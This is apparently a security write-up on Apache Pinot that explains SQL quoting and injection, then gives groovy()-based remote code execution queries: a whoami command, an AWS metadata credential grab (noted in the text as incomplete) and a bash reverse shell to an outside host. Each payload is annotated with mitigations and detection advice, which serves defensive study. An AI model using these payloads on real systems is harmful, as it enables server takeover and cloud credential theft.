引言
Apache Pinot简介
架构细节
测试环境搭建
通过Kubernetes快速启动Minikube。
安装Pinot Helm Chart。
通过Kafka进行数据摄取。
暴露控制器端口以访问查询编辑器和集群管理UI。
SQL语法与注入基础
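-- Syntax reference for the quoting rules that decide whether user input can
-- break out of a literal. Each statement sits on its own line: when a
-- statement follows a `--` marker on the same physical line, the whole line
-- is parsed as a comment and nothing executes.

-- String handling: double quotes delimit identifiers, single quotes delimit
-- string literals, and a doubled single quote ('') is an escaped quote inside
-- a literal. Code that builds a query by concatenation must escape or reject
-- quote characters in every user-supplied value.
SELECT
    "someColumn",
    'a ''string'' with quotes',
    CONCAT('abc','efg','d')
FROM myTable;

-- Substring with negative indexes; the page gives the result as 'def'.
SELECT SUBSTR('abcdef', -3, -1)
FROM ignoreMe; -- 'def'

-- Filter: `0 = Year - Year` is a tautology for any non-null Year, the kind of
-- always-true predicate worth flagging when it shows up in query logs.
SELECT *
FROM airlineStatsAvro
WHERE 0 = Year - Year
  AND ArrTimeBlk != 'blahblah-bc';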
远程代码执行(RCE)
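-- Security review: all three statements depend on Pinot's groovy() function
-- evaluating a caller-supplied script inside the Pinot JVM. Where Groovy is
-- enabled for queries, any SQL injection (or any unauthenticated access to the
-- query endpoint) is equivalent to OS command execution as the Pinot process
-- user.
-- Mitigation: keep Groovy disabled for queries (broker setting
-- pinot.broker.disable.query.groovy), require authentication on the broker and
-- controller, and do not expose the query console outside the admin network.
-- Detection: alert on query text containing `groovy(` and on the Pinot process
-- spawning child processes (whoami, curl, bash).

-- Get the current user: runs `whoami` on the host and prints its output.
SELECT *
FROM myTable
WHERE groovy('{"returnType":"INT","isSingleValue":true}', 'println "whoami".execute().text; return 1') = 1
LIMIT 5;

-- Read temporary AWS IAM credentials from the instance metadata service.
-- NOTE(review): as printed the script is incomplete - `collab` is assigned but
-- never used, and no value is returned for the declared INT return type.
-- Mitigation: enforce IMDSv2 with a hop limit of 1 and block pod access to
-- 169.254.169.254 with a network policy, so a plain GET from a container
-- cannot obtain role credentials; scope the node role to least privilege.
SELECT *
FROM myTable
WHERE groovy('{"returnType":"INT","isSingleValue":true}', 'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/"; def collab = "xyz.burpcollaborator.net/"; def role = "curl -s ${aws}".execute().text.split("\n")[0].trim(); def creds = "curl -s ${aws}${role}".execute().text;') = 1;

-- Reverse shell: starts an interactive bash connected to an external host.
-- Mitigation: default-deny egress from Pinot pods, run the container as a
-- non-root user on a minimal image, and alert on outbound connections from
-- Pinot to destinations outside the cluster.
SELECT *
FROM myTable
WHERE groovy('{"returnType":"INT","isSingleValue":true}', '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1"].execute(); return 1') = 1;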


